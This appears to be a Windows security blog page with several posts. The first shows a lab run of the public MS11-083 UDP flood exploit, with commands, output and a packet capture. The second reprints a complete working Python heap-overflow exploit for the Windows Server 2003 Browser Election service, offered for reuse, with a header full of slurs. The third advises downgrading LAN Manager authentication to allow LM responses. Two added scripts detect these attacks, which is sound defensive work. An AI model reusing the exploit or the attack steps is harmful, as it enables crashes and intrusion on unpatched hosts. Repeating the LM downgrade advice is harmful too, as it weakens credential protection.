

Reported by SANS:

An integer overflow in the TCP/IP stack allows random code execution from a stream of UDP packets sent to a closed port. Permissions for the attacker are at kernel level.

After the exploit for vulnerability MS11-083 was released, I ran a proof of concept to check what actually happens in that situation.

Microsoft stated that successful exploitation requires sending roughly 2^32 UDP packets.

The lab has a Debian box that runs the attack and a Windows 2003 Standard target with 1 GB of RAM and 4 CPUs.

The publicly released exploit: http://packetstormsecurity.org/files/106873/winnuke2011.sh.txt ; I used only the C code.

Compiling...

debian:~/2003# gcc -lpthread MS11-083.c -o MS11-083

debian:~/2003# ./MS11-083
[+] MS11-083 DoS/PoC exploit
[!] Usage : ./MS11-083 <server> <port>

On Windows, everything under control..

Before the attack (screenshot)

Starting the attack...

debian:~/2003# ./MS11-083 192.168.10.131 1000
[+] MS11-083 DoS/PoC exploit
[-] Sending payload 'ZSW"<kc'ULJ=VK%XE-cP0*%('bORT=";D"[c=S'
[-] Thread number 0 started
[-] Sending payload '60&a;%=^,7FKMc[D=J>90J6Y7DR]*PC<&8'.%) '
[-] Thread number 1 started
[-] Sending payload 'dCJe-f+65f9@NJhH-c"!?XU% (7#TDOhjIa+`=_)'
[-] Thread number 2 started
[-] Sending payload '/;.S"0:#dd=kSACiD=S!OLO#V/ZLP<]L`?,/D$'
[-] Thread number 3 started
[-] Sending payload '"S.Q]=JOT" (8%O)-4bF+NeN I@**A<.Di/RV\5>'
[-] Thread number 4 started
[-] Sending payload 'Ag0BMF"FF[ aB]*9*UQi<2H!8X&LieC>`U1AKQ7B'
[-] Thread number 5 started
[-] Sending payload ',=aTOe9-]"A&,B-;:b,f0<@BVX#VbM'WQD;K_f'
[-] Thread number 6 started
[-] Sending payload 'AH2M R!h\+#H>e.VD-bDI;1"JJ' JeQG6Sg2C'
[-] Thread number 7 started
[-] Sending payload '*X-KOSYQF!86#M53C^f1Z+jM=*+[.e56&0h)kiQ'
[-] Thread number 8 started

Within seconds we can see the Windows performance graph..

After the attack (screenshot)

In another console we have the tcpdump output:

debian:~/2003# tcpdump -X -vvv -i eth0 dst host 192.168.10.131
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
23:47:47.221788 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 69) 192.168.10.128.33405 > 192.168.10.131.1000: [udp sum ok] UDP, length 41
0x0000:  4500 0045 0000 4000 4011 a454 c0a8 0a80  E..E..@.@..T....
0x0010:  c0a8 0a83 827d 03e8 0031 bee0 6250 5d2a  .....}...1..bP]*
0x0020:  3b2e 5028 246a 5d3d 5632 273b 3a49 2156  ;.P($j]=V2';:I!V
0x0030:  2069 3a2d 3725 5f22 5723 284d 5536 2741  .i:-7%_"W#(MU6'A
0x0040:  465a 4b4c 00                             FZKL.
23:47:47.221846 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 69) 192.168.10.128.33405 > 192.168.10.131.1000: [udp sum ok] UDP, length 41
0x0000:  4500 0045 0000 4000 4011 a454 c0a8 0a80  E..E..@.@..T....
0x0010:  c0a8 0a83 827d 03e8 0031 bee0 6250 5d2a  .....}...1..bP]*
0x0020:  3b2e 5028 246a 5d3d 5632 273b 3a49 2156  ;.P($j]=V2';:I!V
0x0030:  2069 3a2d 3725 5f22 5723 284d 5536 2741  .i:-7%_"W#(MU6'A
0x0040:  465a 4b4c 00                             FZKL.
23:47:47.221850 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 69) 192.168.10.128.33405 > 192.168.10.131.1000: [udp sum ok] UDP, length 41
0x0000:  4500 0045 0000 4000 4011 a454 c0a8 0a80  E..E..@.@..T....
0x0010:  c0a8 0a83 827d 03e8 0031 bee0 6250 5d2a  .....}...1..bP]*
0x0020:  3b2e 5028 246a 5d3d 5632 273b 3a49 2156  ;.P($j]=V2';:I!V
0x0030:  2069 3a2d 3725 5f22 5723 284d 5536 2741  .i:-7%_"W#(MU6'A
0x0040:  465a 4b4c 00                             FZKL.
23:47:47.221853 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 69) 192.168.10.128.33405 > 192.168.10.131.1000: [udp sum ok] UDP, length 41
0x0000:  4500 0045 0000 4000 4011 a454 c0a8 0a80  E..E..@.@..T....
0x0010:  c0a8 0a83 827d 03e8 0031 bee0 6250 5d2a  .....}...1..bP]*
0x0020:  3b2e 5028 246a 5d3d 5632 273b 3a49 2156  ;.P($j]=V2';:I!V
0x0030:  2069 3a2d 3725 5f22 5723 284d 5536 2741  .i:-7%_"W#(MU6'A
0x0040:  465a 4b4c 00                             FZKL.
23:47:47.221856 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 69) 192.168.10.128.33405 > 192.168.10.131.1000: [udp sum ok] UDP, length 41
0x0000:  4500 0045 0000 4000 4011 a454 c0a8 0a80  E..E..@.@..T....
0x0010:  c0a8 0a83 827d 03e8 0031 bee0 6250 5d2a  .....}...1..bP]*
0x0020:  3b2e 5028 246a 5d3d 5632 273b 3a49 2156  ;.P($j]=V2';:I!V
0x0030:  2069 3a2d 3725 5f22 5723 284d 5536 2741  .i:-7%_"W#(MU6'A
0x0040:  465a 4b4c 00                             FZKL.

In this scenario there is only one attacking machine, and the script is using all of the Debian box's CPU.

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
 3541 root      20   0  273m  976  484 S 97.2  0.2   0:16.40 MS11-083

In the current lab we could not cause a DoS on the target, but from the results we saw that it would be possible iiiiiiiif... the firewall were disabled....

Now let's enable the Windows firewall, and go back to the attack and the graphs...

Firewalled (screenshot)

In other words, the attack can be mitigated without much trouble. Completing the 2^32 packets would take roughly 52 days, so we stop here without real proof that remote code execution would be possible.
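A defender's view of the same traffic. The script below is an added example written for this page; it is not part of the original post or of the exploit it discusses. It parses tcpdump summary lines of the shape shown in the capture above, counts datagrams per source/destination/port in each wall-clock second, flags sources hammering a port on which no service listens, and projects how long reaching the 2^32 datagrams mentioned in the bulletin would take at a given rate. The sample capture, the listening-port set and the 500 pps threshold are constructed for the example.

```python
import re
from collections import Counter, defaultdict

# Matches the one-line summary tcpdump prints before each hex dump (same shape as the
# capture in the post). Only the timestamp, addresses, ports and length are extracted.
SUMMARY_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+) IP .*?"
    r"(?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): .*UDP, length (?P<len>\d+)$"
)


def parse_summary(line):
    """Return the fields of one tcpdump UDP summary line, or None for hex-dump/other lines."""
    m = SUMMARY_RE.match(line)
    if not m:
        return None
    hh, mm, ss = m.group("ts").split(":")
    return {
        "ts": int(hh) * 3600 + int(mm) * 60 + float(ss),  # seconds since midnight
        "src": m.group("src"), "dst": m.group("dst"),
        "dport": int(m.group("dport")), "len": int(m.group("len")),
    }


def flow_stats(lines):
    """Aggregate datagrams per (src, dst, dport): total count and peak packets in any one second."""
    per_second = defaultdict(Counter)  # flow -> {whole second: datagram count}
    for line in lines:
        p = parse_summary(line)
        if p is None:
            continue
        per_second[(p["src"], p["dst"], p["dport"])][int(p["ts"])] += 1
    return {flow: {"count": sum(c.values()), "peak_pps": max(c.values())}
            for flow, c in per_second.items()}


def closed_port_floods(stats, listening_ports, threshold_pps=500):
    """Flag flows aimed at a port nothing listens on at or above threshold_pps in some second."""
    return sorted(flow for flow, s in stats.items()
                  if flow[2] not in listening_ports and s["peak_pps"] >= threshold_pps)


def days_to_send(packets, pps):
    """Wall-clock days needed to push `packets` datagrams at `pps` datagrams per second."""
    return packets / pps / 86400.0


def make_sample_capture():
    """Constructed sample: 1200 datagrams to closed port 1000 within one second, plus 3 DNS
    queries from another host, plus one hex-dump line that the parser must ignore."""
    fmt = ("23:47:47.{us:06d} IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), "
           "length 69) {src}.{sport} > {dst}.{dport}: [udp sum ok] UDP, length 41")
    lines = [fmt.format(us=i * 800, src="192.168.10.128", sport=33405,
                        dst="192.168.10.131", dport=1000) for i in range(1200)]
    lines += [fmt.format(us=i * 300000, src="192.168.10.50", sport=51000 + i,
                         dst="192.168.10.131", dport=53) for i in range(3)]
    lines.append("0x0000:  4500 0045 0000 4000 4011 a454 c0a8 0a80  E..E..@.@..T....")
    return lines


if __name__ == "__main__":
    stats = flow_stats(make_sample_capture())
    for flow in closed_port_floods(stats, listening_ports={53}):
        print("flood to closed port:", flow, stats[flow])
    # At the rate the post's 52-day estimate implies (about 956 pps, a figure back-derived
    # here from 2^32 / 52 days, not a measurement), reaching 2^32 datagrams takes ~52 days.
    print("days to send 2^32 datagrams at 956 pps: %.1f" % days_to_send(2 ** 32, 956))
```

The rate is measured per whole second because that is what a firewall log or a NetFlow record would give you; a five-packet burst like the one in the capture above is not a flood on its own, only the sustained rate is. The 956 pps figure is back-derived from the post's 52-day estimate and is not a measured value.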

More information about the bug: http://technet.microsoft.com/en-us/security/bulletin/ms11-083

In short: firewall always on and system kept up to date!

Another exploit and more info can also be found at: http://blog.rootentropy.co.za/post/12567851289/ms11-083-traffic-capture

[]'s

Sergito

Without much commentary, short and to the point: Windows 2003 Server remote heap overflow!

####################################################################################
#MS Windows Server 2003 AD Pre-Auth BROWSER ELECTION Remote Heap Overflow
#Release date: 2011-02-14
#Anonymous Comment: Apologies if this puts a downer on the MSRC valentines day sausage fest
#Author: Cupidon-3005
#Greet: Winny Thomas, Laurent Gaffie, h07
#Bug: Heap Overflow
#Remote Exploitability: Unlikely
#Local Exploitability: Likely
#Context: Broadcast, Pre-Auth
#Special Valentines Greetings: Ruben Santamarta, is your password still "hijodeputa"? You look even more like a dumb fuck than you used to.
#From dailydave: [https://lists.immunityinc.com/pipermail/dailydave/20110121/000057.html], So your 31337 con is the only place to get 0day? Here's some pre-auth /
#broadcast 0day free for all on FD with 0% conference whoring, and punks are welcome as well.
#####################################################################################
#Mrxsmb.sys, around BowserWriteErrorLog+0x175, while trying to copy 1go from ESI to EDI ...
#Code will look something like this:
#if ((Len + 1) * sizeof(WCHAR)) > TotalBufferSize) { Len = TotalSize/sizeof(WCHAR) - 1; }
#-1 causes Len to go 0xFFFFFFFF
#Feel free to reuse this code without restrictions and ask Kingcope-Fag to perform his FTP FU on SMB, he might have more luck than MS.
import socket,sys,struct
from socket import *

if len(sys.argv)<=4:
 sys.exit("""usage: python sploit.py UR-IP BCAST-IP NBT-NAME AD-NAME
 example: python sploit.py 192.168.1.10 192.168.1.255 OhYeah AD-NETBIOS-NAME""")

ourip = sys.argv[1]
host = sys.argv[2]
srcname = sys.argv[3].upper()
dstname = sys.argv[4].upper()

ELEC            = "\x42\x4f\x00"
WREDIR          = "\x41\x41\x00"

def encodename(nbt,service):
    final = '\x20'+''.join([chr((ord(i)>>4) + ord('A'))+chr((ord(i)&0xF) + ord('A')) for i in nbt])+((15 - len(nbt)) * str('\x43\x41'))+service
    return final

def lengthlittle(packet,addnum):
    length = struct.pack("<i", len(packet)+addnum)[0:2]
    return length

def lengthbig(packet,addnum):
    length = struct.pack(">i", len(packet)+addnum)[2:4]
    return length

def election(srcname):
    elec = "\x08"
    elec+= "\x09" #Be the boss or die
    elec+= "\xa8\x0f\x01\x20" #Be the boss or die
    elec+= "\x1b\xe9\xa5\x00" #Up time
    elec+= "\x00\x00\x00\x00" #Null, like SDLC
    elec+= srcname+"\x00"
    return elec

def smbheaderudp(op="\x25"):
    smbheader= "\xff\x53\x4d\x42"
    smbheader+= op
    smbheader+= "\x00"
    smbheader+= "\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00\x00\x00\x00\x00\x00\x00"
    smbheader+=  "\x00\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00"
    return smbheader

def trans2mailslot(tid="\x80\x0b",ip=ourip,sname="LOVE-SDL",dname="SRD-LOVE",namepipe="\MAILSLOT\BROWSE",srcservice="\x41\x41\x00",dstservice="\x41\x41\x00",pbrowser=""):
    packetbrowser  =  pbrowser
    packetmailslot = "\x01\x00"
    packetmailslot+= "\x00\x00"
    packetmailslot+= "\x02\x00"
    packetmailslot+= lengthlittle(packetbrowser+namepipe,4)
    packetmailslot+= namepipe +"\x00"
    packetdatagram = "\x11"
    packetdatagram+= "\x02"
    packetdatagram+= tid
    packetdatagram+= inet_aton(ip)
    packetdatagram+= "\x00\x8a"
    packetdatagram+= "\x00\xa7"
    packetdatagram+= "\x00\x00"
    packetdatagramname = encodename(sname,srcservice)
    packetdatagramname+= encodename(dname,dstservice)
    smbheader= smbheaderudp("\x25")
    packetrans2 = "\x11"
    packetrans2+= "\x00\x00"
    packetrans2+= lengthlittle(packetbrowser,0)
    packetrans2+= "\x00\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= "\x00"
    packetrans2+= "\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= "\xe8\x03\x00\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= lengthlittle(packetbrowser,0)
    packetrans2+= lengthlittle(smbheader+packetrans2+packetmailslot,4)
    packetrans2+= "\x03"
    packetrans2+= "\x00"
    andoffset = lengthlittle(smbheader+packetrans2+packetmailslot,2)
    lengthcalc = packetdatagramname+smbheader+packetrans2+packetmailslot+packetbrowser
    packetfinal = packetdatagram+packetdatagramname+smbheader+packetrans2+packetmailslot+packetbrowser
    packetotalength = list(packetfinal)
    packetotalength[10:12] = lengthbig(lengthcalc,0)
    packetrans2final = ''.join(packetotalength)
    return packetrans2final

def sockbroad(host,sourceservice,destservice,packet):
   s = socket(AF_INET,SOCK_DGRAM)
   s.setsockopt(SOL_SOCKET, SO_BROADCAST,1)
   s.bind(('0.0.0.0', 138))
   try:
      packsmbheader = smbheaderudp("\x25")
      buffer0 = trans2mailslot(tid="\x80\x22",ip=ourip,sname=srcname,dname=dstname,namepipe="\MAILSLOT\BROWSER",srcservice=sourceservice,dstservice=destservice, pbrowser=packet)
      s.sendto(buffer0,(host,138))
   except:
      print "expected SDL error:", sys.exc_info()[0]
      raise

sockbroad(host,WREDIR,ELEC,election("A" * 410)) # -> Zing it! (between ~60->410)
print "Happy St-Valentine Bitches\nMSFT found that one loooooooong time ago...."
####################################################################################

by packetstormsecurity

[]'s
Sergito
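For an analyst looking at broadcast traffic on UDP/138, the block below is an added example written for this page, not part of the exploit above or of the original post. It decodes the NetBIOS datagram header and the first-level encoded names that the script builds with encodename(), then parses the Browser Election Request frame and flags a server name longer than the 15 characters a NetBIOS name can hold, which is the field the script fills with 410 bytes. The sample datagram, host names and addresses are constructed; the SMB transaction and mailslot layer that wraps the election frame on the wire is skipped, so the election frame is placed directly as datagram user data.

```python
import struct

NB_NAME_LEN = 15               # a NetBIOS name is 15 characters; byte 16 is the service suffix
SUFFIX_BROWSER_ELECTION = 0x1E  # the "BO" suffix in the exploit's ELEC constant decodes to 0x1E
OPCODE_ELECTION = 0x08          # Browser Election Request opcode (MS-BRWS)


def decode_netbios_name(buf, off=0):
    """Decode one RFC 1002 first-level encoded name at buf[off:] -> (name, suffix, next_off).

    Wire form: 0x20 length byte, 32 bytes in 'A'..'P' (two per original byte), 0x00 terminator.
    This is the inverse of the exploit's encodename().
    """
    if len(buf) < off + 34 or buf[off] != 0x20 or buf[off + 33] != 0x00:
        raise ValueError("malformed NetBIOS name at offset %d" % off)
    raw = bytearray()
    for i in range(off + 1, off + 33, 2):
        hi, lo = buf[i] - 0x41, buf[i + 1] - 0x41
        if not (0 <= hi <= 15 and 0 <= lo <= 15):
            raise ValueError("non-nibble character in encoded name at offset %d" % i)
        raw.append((hi << 4) | lo)
    return raw[:NB_NAME_LEN].decode("ascii").rstrip(" "), raw[NB_NAME_LEN], off + 34


def encode_netbios_name(name, suffix):
    """First-level encode a name (inverse of decode_netbios_name); used only to build samples."""
    if len(name) > NB_NAME_LEN:
        raise ValueError("NetBIOS name longer than %d characters" % NB_NAME_LEN)
    raw = name.upper().encode("ascii").ljust(NB_NAME_LEN, b" ") + bytes([suffix])
    enc = b"".join(bytes([(b >> 4) + 0x41, (b & 0xF) + 0x41]) for b in raw)
    return b"\x20" + enc + b"\x00"


def parse_datagram(pkt):
    """Parse a NetBIOS datagram service header (UDP/138) and its source/destination names."""
    if len(pkt) < 14:
        raise ValueError("short datagram header")
    msg_type, flags, dgm_id, src_ip, src_port, dgm_len, pkt_off = struct.unpack("!BBH4sHHH", pkt[:14])
    src_name, src_suffix, off = decode_netbios_name(pkt, 14)
    dst_name, dst_suffix, off = decode_netbios_name(pkt, off)
    return {
        "msg_type": msg_type, "flags": flags, "dgm_id": dgm_id,
        "src_ip": ".".join(str(b) for b in src_ip), "src_port": src_port,
        "dgm_len": dgm_len, "dgm_len_matches": dgm_len == len(pkt) - 14,  # bytes after PACKET_OFFSET
        "src": (src_name, src_suffix), "dst": (dst_name, dst_suffix),
        "user_data": pkt[off:],
    }


def parse_election(frame):
    """Parse a Browser Election Request: opcode, version, criteria, uptime, reserved, name\\0."""
    if len(frame) < 15 or frame[0] != OPCODE_ELECTION:
        raise ValueError("not a browser election request")
    _op, version, criteria, uptime, _reserved = struct.unpack("<BBIII", frame[:14])
    name = frame[14:].split(b"\x00", 1)[0]
    return {"version": version, "criteria": criteria, "uptime": uptime,
            "server_name": name.decode("latin-1"), "name_len": len(name),
            "oversized": len(name) > NB_NAME_LEN}


def audit_datagram(pkt):
    """Return findings for one datagram: length-field mismatch, or an election frame sent to the
    0x1E browser-election group whose server name exceeds the NetBIOS name length."""
    d = parse_datagram(pkt)
    findings = []
    if not d["dgm_len_matches"]:
        findings.append("DGM_LENGTH field does not match payload length")
    if d["dst"][1] == SUFFIX_BROWSER_ELECTION and d["user_data"][:1] == bytes([OPCODE_ELECTION]):
        e = parse_election(d["user_data"])
        if e["oversized"]:
            findings.append("election server name %d bytes > %d" % (e["name_len"], NB_NAME_LEN))
    return findings


def make_sample(server_name):
    """Constructed sample datagram (header + names + election frame as user data); the
    host names, IP and datagram id are made up for this example."""
    election = struct.pack("<BBIII", OPCODE_ELECTION, 0x09, 0x20010FA8, 0x00A5E91B, 0)
    election += server_name.encode("ascii") + b"\x00"
    names = encode_netbios_name("LABHOST", 0x00) + encode_netbios_name("LABDOMAIN", SUFFIX_BROWSER_ELECTION)
    body = names + election
    hdr = struct.pack("!BBH4sHHH", 0x11, 0x02, 0x8022, bytes([192, 168, 10, 128]), 138, len(body), 0)
    return hdr + body


if __name__ == "__main__":
    for name in ("WS01", "A" * 20):
        print(name[:8], "->", audit_datagram(make_sample(name)) or "no findings")
```

The check on the election server name is the one a network sensor can apply directly: the NetBIOS layer already limits a name to 15 characters, so any election frame carrying a longer name is malformed regardless of whether the receiving mrxsmb.sys is patched.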

A while ago I had to redo the firewall at the company where I work. Previously it used msnt_auth authentication, which prompted the user for their domain login and password to access the internet. I decided to change this authentication mode to avoid that pop-up, so that as soon as the user logs in and accesses the internet the credentials are sent to squid automatically, with no need to type a username and password.

Buuuuuut... I ran into a problem: logged in with my user on a Windows Server 2003 box, I tried to browse and it asked for the password again. I typed the password and still could not browse..

I posted my question on forums and mailing lists and nobody helped me; after a lot of work I managed to find the solution to my problem, which was to lower the authentication level that Windows Server 2003 uses to communicate with other services. Here is how to fix it on Windows Server 2003:

Start > Administrative Tools > Domain Controller Security Policy

Security Settings > Local Policies > Security Options

Then just set the item "Network security: LAN Manager authentication level" to "Send LM & NTLM responses".

Done!!

[]'s Sergito